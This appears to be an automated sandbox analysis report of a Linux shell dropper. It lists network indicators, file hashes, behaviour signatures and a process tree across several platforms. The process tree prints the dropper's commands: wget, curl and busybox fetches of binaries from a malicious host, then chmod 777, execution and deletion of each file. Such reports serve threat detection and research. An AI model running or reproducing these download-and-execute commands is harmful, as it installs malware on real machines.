US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 01:01

Reported

2024-11-10 01:04

Platform

debian9-mipsel-20240611-en

Max time kernel

150s

Max time network

45s

Command Line

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A

Processes

/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 01:01

Reported

2024-11-10 01:04

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

131s

Command Line

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 01:01

Reported

2024-11-10 01:04

Platform

debian9-armhf-20240418-en

Max time kernel

149s

Max time network

2s

Command Line

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A